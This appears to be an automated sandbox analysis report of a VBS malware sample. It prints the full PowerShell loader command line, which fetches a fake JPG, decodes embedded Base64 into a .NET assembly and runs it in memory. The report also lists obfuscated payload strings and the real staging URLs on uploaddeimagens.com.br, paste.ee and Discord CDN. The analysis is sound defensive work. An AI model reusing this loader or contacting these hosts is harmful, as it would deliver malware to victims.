gTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMe
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
        Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
        Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
        Source: http://uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
        Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
        Source: upload.vbsVirustotal: Detection: 12%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.7% probability
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49708 version: TLS 1.2

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
        Source: unknownDNS query: name: paste.ee
        Source: cognitivo.vbs.6.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
        Source: cognitivo.vbs.6.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
        Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
        Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /d/Vm93m HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /d/Vm93m HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
        Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
        Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
        Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 13:21:16 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=XtWu8b_DL.uRh9fTgWs3VLmbsUgYn9pWKo0ZX5Ax1tc-1716816076-1.0.1.1-VqzG.1b2xao5e8StVsbRl_I3pGkd5FOcUjwGtJWLuFpHZzzUFP_dZKCoCgC7aFPiuk572FOjvvm44nJEY.WyNQ; path=/; expires=Mon, 27-May-24 13:51:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sc%2BJ9ZTcDks5yH0i6vJm0dczQaxfC6v6qk65PMcQNRJOJVYj9H7Z%2FJmK7oawLNrXunr%2BpjbjuiQ20TvfbcCK1aymLqvkneGElrydTNwLhlzx5FhmjoYSEHtfMJdVpxuc1quAA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=r.7G2AYBMLtcTxi40Hh6Pc2Z.gA3U5ZzXK.wmV6EI2s-1716816076857-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 88a64ea04f18438a-EWRalt-svc: h3=":443"; ma=86400
        Source: powershell.exe, 00000002.00000002.2614806949.0000015D3EBB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031451843.0000021F66031000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035139367.0000021F66032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
        Source: powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2578636274.0000015D26B4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2206715174.00000245A1071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A756E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2578636274.0000015D26B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000002.00000002.2578636274.0000015D26B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2206715174.00000245A1071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
        Source: powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: wscript.exe, 00000000.00000002.2034976437.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2029725990.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: wscript.exe, 00000000.00000002.2034976437.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2029725990.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
        Source: wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Vm93m
        Source: wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Vm93m/(
        Source: wscript.exe, 00000000.00000003.2033034974.0000021F63E14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034480793.0000021F63E14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030902082.0000021F63DEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/Vm93mll
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
        Source: powershell.exe, 00000004.00000002.2206715174.00000245A1071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
        Source: wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49708 version: TLS 1.2

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 1360, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9770
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9770Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYw